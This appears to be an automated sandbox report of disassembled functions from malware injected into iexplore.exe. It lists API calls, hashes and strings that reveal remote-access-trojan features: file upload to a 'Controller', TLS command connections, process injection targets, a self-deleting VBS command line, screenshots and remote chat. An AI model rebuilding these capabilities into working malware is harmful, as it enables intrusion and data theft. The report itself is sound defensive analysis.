                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1657328048-3535843008
                                                  • Opcode ID: 75a75119f7dbe70d268f878262eb13eae1834a2aacf9c076630911016ce8ccd8
                                                  • Instruction ID: d444178910c57d72425b9bad214632d186804991f0ac69b1ba9ad0c1e886ec5e
                                                  • Opcode Fuzzy Hash: 75a75119f7dbe70d268f878262eb13eae1834a2aacf9c076630911016ce8ccd8
                                                  • Instruction Fuzzy Hash: AC21F47598414AEFEF156FB4ED1EBB97B36EB04301F100A14B9469A2E0D7719D30DB10
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 02DC138A
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC059F
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC05B1
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC05C3
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC05D5
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC05E7
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC05F9
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC060B
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC061D
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC062F
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC0641
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC0653
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC0665
                                                    • Part of subcall function 02DC0582: _free.LIBCMT ref: 02DC0677
                                                  • _free.LIBCMT ref: 02DC137F
                                                    • Part of subcall function 02DB6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000), ref: 02DB6818
                                                    • Part of subcall function 02DB6802: GetLastError.KERNEL32(00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000,00000000), ref: 02DB682A
                                                  • _free.LIBCMT ref: 02DC13A1
                                                  • _free.LIBCMT ref: 02DC13B6
                                                  • _free.LIBCMT ref: 02DC13C1
                                                  • _free.LIBCMT ref: 02DC13E3
                                                  • _free.LIBCMT ref: 02DC13F6
                                                  • _free.LIBCMT ref: 02DC1404
                                                  • _free.LIBCMT ref: 02DC140F
                                                  • _free.LIBCMT ref: 02DC1447
                                                  • _free.LIBCMT ref: 02DC144E
                                                  • _free.LIBCMT ref: 02DC146B
                                                  • _free.LIBCMT ref: 02DC1483
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 7342b1630156cc0b311f36087dd6cf3855af6d563a15f39412dd991f471eafe4
                                                  • Instruction ID: 000acf554a3baa965cbaf2d758aece130d1313d33f49d760c67b90afeac9a3e5
                                                  • Opcode Fuzzy Hash: 7342b1630156cc0b311f36087dd6cf3855af6d563a15f39412dd991f471eafe4
                                                  • Instruction Fuzzy Hash: 53314771604612DAEF22AA29D855B9A73E9FF01314F60892DE499DB391DB70ED80CF60
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 02D78D1E
                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 02D78D56
                                                  • __aulldiv.LIBCMT ref: 02D78D88
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                    • Part of subcall function 02D8B580: GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D78EAB
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D78EC6
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D78F9F
                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 02D78FE9
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D79037
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                  • API String ID: 3086580692-2596673759
                                                  • Opcode ID: f431d3fee300f235523b33418aa1647fe7b0831a9300282c9d02aee204430818
                                                  • Instruction ID: 9b080774d80954bd05368dbc11b71bb6fa14103b0986e2acebf4ac87e3061272
                                                  • Opcode Fuzzy Hash: f431d3fee300f235523b33418aa1647fe7b0831a9300282c9d02aee204430818
                                                  • Instruction Fuzzy Hash: F6B16C316083409BD314FB24D895AAFB7E6EF84314F504A1DE48A82390FF799D49DFA6
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 02D748E0
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02D74A00
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02D74A0E
                                                  • WSAGetLastError.WS2_32 ref: 02D74A21
                                                    • Part of subcall function 02D8B580: GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 2e33a77b248c974d8fd5a49fb79bdc331794a69dd79f8d54979542c437594a44
                                                  • Instruction ID: 60cd75fc533d86941631c2d12f34739b1ba112b4a776ec898bdf98a29bbc25d5
                                                  • Opcode Fuzzy Hash: 2e33a77b248c974d8fd5a49fb79bdc331794a69dd79f8d54979542c437594a44
                                                  • Instruction Fuzzy Hash: 5C411775B406026BAB157779A91A83DBB6BEB41308F90051DD80247B95FF25AC24CFF3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 3995cc6b7ba15ef882a2bba35946f2eaf47fa940c07edcecfab8cd800d7275ab
                                                  • Instruction ID: 85e1ecc74a331b3e8743a64053b5b11cc86a245c37411ccdf2041186edae6f69
                                                  • Opcode Fuzzy Hash: 3995cc6b7ba15ef882a2bba35946f2eaf47fa940c07edcecfab8cd800d7275ab
                                                  • Instruction Fuzzy Hash: 2CC143B2D40205ABDB20DAA8CC86FDE77ADEF04701F144169FA45FB381D6B09D419B64
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,02DE4F08,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74E38
                                                  • SetEvent.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74E43
                                                  • CloseHandle.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74E4C
                                                  • closesocket.WS2_32(?), ref: 02D74E5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74E91
                                                  • SetEvent.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74EA2
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74EA9
                                                  • SetEvent.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74EBA
                                                  • CloseHandle.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74EBF
                                                  • CloseHandle.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74EC4
                                                  • SetEvent.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74ED1
                                                  • CloseHandle.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74ED6
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 8ac7a781ac093f4ed0757fb82dea8d49f46b97aa13517a0f745539f81005459f
                                                  • Instruction ID: 19a618d5c5965185599d2552ce982496bacdb70fa5772c2bf2f711ea12e21e3c
                                                  • Opcode Fuzzy Hash: 8ac7a781ac093f4ed0757fb82dea8d49f46b97aa13517a0f745539f81005459f
                                                  • Instruction Fuzzy Hash: 4F210931440B029FDB226B25DC49B67BBA2FF40336F204E1CE1E201AB4DB65AC21DB54
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02D82B08
                                                    • Part of subcall function 02D8BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02DD6478,02D7D248,.vbs,?,?,?,?,?,02DE5300), ref: 02D8BA30
                                                    • Part of subcall function 02D885A3: CloseHandle.KERNEL32(02D740F5,?,?,02D740F5,02DD5E84), ref: 02D885B9
                                                    • Part of subcall function 02D885A3: CloseHandle.KERNEL32(02DD5E84,?,?,02D740F5,02DD5E84), ref: 02D885C2
                                                  • Sleep.KERNEL32(0000000A,02DD5E84), ref: 02D82C5A
                                                  • Sleep.KERNEL32(0000000A,02DD5E84,02DD5E84), ref: 02D82CFC
                                                  • Sleep.KERNEL32(0000000A,02DD5E84,02DD5E84,02DD5E84), ref: 02D82D9E
                                                  • DeleteFileW.KERNEL32(00000000,02DD5E84,02DD5E84,02DD5E84), ref: 02D82E00
                                                  • DeleteFileW.KERNEL32(00000000,02DD5E84,02DD5E84,02DD5E84), ref: 02D82E37
                                                  • DeleteFileW.KERNEL32(00000000,02DD5E84,02DD5E84,02DD5E84), ref: 02D82E73
                                                  • Sleep.KERNEL32(000001F4,02DD5E84,02DD5E84,02DD5E84), ref: 02D82E8D
                                                  • Sleep.KERNEL32(00000064), ref: 02D82ECF
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "
                                                  • API String ID: 1223786279-3856184850
                                                  • Opcode ID: f4d39f2e32e2ec4ffa0fc77125a34999bb79e8a3305d40a7474ad15b6ae12284
                                                  • Instruction ID: 2f99364430030b03531a139ed54095ccaa23f386e51b89b31fbf613f3cb7b27b
                                                  • Opcode Fuzzy Hash: f4d39f2e32e2ec4ffa0fc77125a34999bb79e8a3305d40a7474ad15b6ae12284
                                                  • Instruction Fuzzy Hash: 8102E1325083818AC325FB61D8A5AEFF3E6EF94304F50491DD48A872D4FF749E49CA66
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,02DE50F4,?,02DE5348), ref: 02D7F4C9
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,02DE5348), ref: 02D7F4F4
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02D7F510
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D7F58F
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,02DE5348), ref: 02D7F59E
                                                    • Part of subcall function 02D8C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02D8C286
                                                    • Part of subcall function 02D8C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02D8C299
                                                  • CloseHandle.KERNEL32(00000000,?,02DE5348), ref: 02D7F6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                  • API String ID: 3756808967-1743721670
                                                  • Opcode ID: 73879a0f4df39c53985b8323806809a307fedd1563cdf9673a58baf587659a69
                                                  • Instruction ID: 731856ca614288cc515219b779a092daa140299788321c65f0591cdbc82a8ce6
                                                  • Opcode Fuzzy Hash: 73879a0f4df39c53985b8323806809a307fedd1563cdf9673a58baf587659a69
                                                  • Instruction Fuzzy Hash: 77710E315083429ADB64FB20D8549AEB7A6EF90340F90491DE58A433A1FF38DD4DCF62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: aad70ad58304a0d55151721d0c6b63aed80fc1cd57b5fbbbe0e33dec424a3b1d
                                                  • Instruction ID: 66e6e41d8d42ca23795a0745da130c6339a0cf5b1e27d7b7a62da730ae93737d
                                                  • Opcode Fuzzy Hash: aad70ad58304a0d55151721d0c6b63aed80fc1cd57b5fbbbe0e33dec424a3b1d
                                                  • Instruction Fuzzy Hash: AE51C475649343ABD724BA24D904BBB77E8EF84758F09092DF9859B390FB78CC40C662
                                                  APIs
                                                    • Part of subcall function 02D8288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02D7F903), ref: 02D8289B
                                                    • Part of subcall function 02D8288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02D828AE
                                                    • Part of subcall function 02D83733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,02DE5300), ref: 02D8374F
                                                    • Part of subcall function 02D83733: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 02D83768
                                                    • Part of subcall function 02D83733: RegCloseKey.ADVAPI32(00000000), ref: 02D83773
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 02D7D894
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,02DD6478,02DD6478,00000000), ref: 02D7D9F3
                                                  • ExitProcess.KERNEL32 ref: 02D7D9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  • API String ID: 1913171305-2411266221
                                                  • Opcode ID: 58cf054267ca56d9754cf26f445e4e1cd4cb99967a781b56cb98d210df342dd9
                                                  • Instruction ID: 66a1a4466173669487c5a16da5f7e9062f2ab7fd05ba9b83d35d90d3ac95d3b3
                                                  • Opcode Fuzzy Hash: 58cf054267ca56d9754cf26f445e4e1cd4cb99967a781b56cb98d210df342dd9
                                                  • Instruction Fuzzy Hash: 1E411E329001195ADB15FB64EC55DEEF77AEF60701F504269E40AA33D4FF289E4ACEA0
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02D71BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02DAA912
                                                  • GetLastError.KERNEL32(?,?,02D71BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02DAA91F
                                                  • __dosmaperr.LIBCMT ref: 02DAA926
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02D71BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02DAA952
                                                  • GetLastError.KERNEL32(?,?,?,02D71BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02DAA95C
                                                  • __dosmaperr.LIBCMT ref: 02DAA963
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02D71BD9,?), ref: 02DAA9A6
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,02D71BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02DAA9B0
                                                  • __dosmaperr.LIBCMT ref: 02DAA9B7
                                                  • _free.LIBCMT ref: 02DAA9C3
                                                  • _free.LIBCMT ref: 02DAA9CA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 52a5563f78bfff2e852025f54d688f01a415ca5070ea5306968aed2ec38d470a
                                                  • Instruction ID: 035ba8ac151f2b92b4f80a6359fc8231a2aa4b3e72a8f9be693eb85b79bcaeb8
                                                  • Opcode Fuzzy Hash: 52a5563f78bfff2e852025f54d688f01a415ca5070ea5306968aed2ec38d470a
                                                  • Instruction Fuzzy Hash: 1E31987280520AAFDF12AFA4CC64DAE7B7DFF05324B618219F811A6390DB35CD51CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7
                                                  • API String ID: 0-3177665633
                                                  • Opcode ID: 88968911d3b3b5642907f1339b874008e55ec5b4b3dbb7a6a2d4c4acb5301c1d
                                                  • Instruction ID: 7493c3c039ef05e5a009e1304503b7e2c01dae7be53fbadff4528b9f1edc745b
                                                  • Opcode Fuzzy Hash: 88968911d3b3b5642907f1339b874008e55ec5b4b3dbb7a6a2d4c4acb5301c1d
                                                  • Instruction Fuzzy Hash: F9717F705083069FD714EF20E861BAA7BA5DF85B11F40491DF9D2573D0EA74AE08CBA3
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 02D754BF
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02D7556F
                                                  • TranslateMessage.USER32(?), ref: 02D7557E
                                                  • DispatchMessageA.USER32(?), ref: 02D75589
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,02DE4F88), ref: 02D75641
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02D75679
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 359d18b96868d6db2c323ce58008a984a55cd2d2ea926a7a7bcff1d7bfd5a378
                                                  • Instruction ID: dda60c02b27a2619f3852c7a4d4b49202e06bb316a54b5a3b94505f71f7caf0d
                                                  • Opcode Fuzzy Hash: 359d18b96868d6db2c323ce58008a984a55cd2d2ea926a7a7bcff1d7bfd5a378
                                                  • Instruction Fuzzy Hash: 25417032A442019BCB14FB74D85886E77AAEB85710F904A1DF95697384FF38DD09CBA2
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 02D83452
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 02D83460
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 02D8346D
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 02D8348D
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D8349A
                                                  • CloseHandle.KERNEL32(?), ref: 02D834A0
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                  • String ID:
                                                  • API String ID: 297527592-0
                                                  • Opcode ID: a4dd3088ce79ffe632a249228d0f97b971c35e108576943d2ae4a482d57db8a0
                                                  • Instruction ID: 8c443971f337872b3570bd923933e517a8831e88d221e952b759f569049b4594
                                                  • Opcode Fuzzy Hash: a4dd3088ce79ffe632a249228d0f97b971c35e108576943d2ae4a482d57db8a0
                                                  • Instruction Fuzzy Hash: 6141F071548202BFDB51AA25EC59F6B7BACEB85B68F100919F589D6390DB30CD01CA62
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,02D8A517,00000000), ref: 02D8ABAD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,02D8A517,00000000), ref: 02D8ABC4
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02D8A517,00000000), ref: 02D8ABD1
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02D8A517,00000000), ref: 02D8ABE0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02D8A517,00000000), ref: 02D8ABF1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02D8A517,00000000), ref: 02D8ABF4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: f5cfa3bab31d308ed1582e39c6400c9acf14717564e40c9c87d3a740a64ac9d4
                                                  • Instruction ID: 6c21c9eef2e3659714ce4b03f53f23653344fa071e2f335da21bc305f3cb3e87
                                                  • Opcode Fuzzy Hash: f5cfa3bab31d308ed1582e39c6400c9acf14717564e40c9c87d3a740a64ac9d4
                                                  • Instruction Fuzzy Hash: AE11E532D8011B7F9711BB649C98DFF3B6CEB42371B200516F90692340EB249D45EAB1
                                                  APIs
                                                  • _free.LIBCMT ref: 02DB81B5
                                                    • Part of subcall function 02DB6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000), ref: 02DB6818
                                                    • Part of subcall function 02DB6802: GetLastError.KERNEL32(00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000,00000000), ref: 02DB682A
                                                  • _free.LIBCMT ref: 02DB81C1
                                                  • _free.LIBCMT ref: 02DB81CC
                                                  • _free.LIBCMT ref: 02DB81D7
                                                  • _free.LIBCMT ref: 02DB81E2
                                                  • _free.LIBCMT ref: 02DB81ED
                                                  • _free.LIBCMT ref: 02DB81F8
                                                  • _free.LIBCMT ref: 02DB8203
                                                  • _free.LIBCMT ref: 02DB820E
                                                  • _free.LIBCMT ref: 02DB821C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 121a2ee283971dc95b51367cbb372ebef1df1099f895099a9dd5df65bffe497d
                                                  • Instruction ID: ceaff57bdebe1f37da4e983dffcb9abadda27b9f11ed291cc4a902ef70e69550
                                                  • Opcode Fuzzy Hash: 121a2ee283971dc95b51367cbb372ebef1df1099f895099a9dd5df65bffe497d
                                                  • Instruction Fuzzy Hash: EC1123BA510108EFCB02EF54C962CD93B6AFF04350F5145A9F94A8F261D771DE509F91
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 02D8A04A
                                                  • GdiplusStartup.GDIPLUS(02DE4AE0,?,00000000), ref: 02D8A07C
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02D8A108
                                                  • Sleep.KERNEL32(000003E8), ref: 02D8A18E
                                                  • GetLocalTime.KERNEL32(?), ref: 02D8A196
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02D8A285
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                  • API String ID: 489098229-3790400642
                                                  • Opcode ID: 752a4dec01ecec2b4c7234a7ee3a19289f5ab3bd2baaa4057d161781ed5e518e
                                                  • Instruction ID: 24590efdf8d4b25eaac3c780faade27e1fa9b26bffb9f22b4c7c5cf46e67c58e
                                                  • Opcode Fuzzy Hash: 752a4dec01ecec2b4c7234a7ee3a19289f5ab3bd2baaa4057d161781ed5e518e
                                                  • Instruction Fuzzy Hash: 12517F71E402559ADB14FBB4D864AFEB7BAEF55310F900159E44AAB380FF288E45CB70
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 02D87530
                                                    • Part of subcall function 02D8C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,02DE5300,00000000,02D82232), ref: 02D8C52F
                                                  • Sleep.KERNEL32(00000064), ref: 02D8755C
                                                  • DeleteFileW.KERNEL32(00000000), ref: 02D87590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
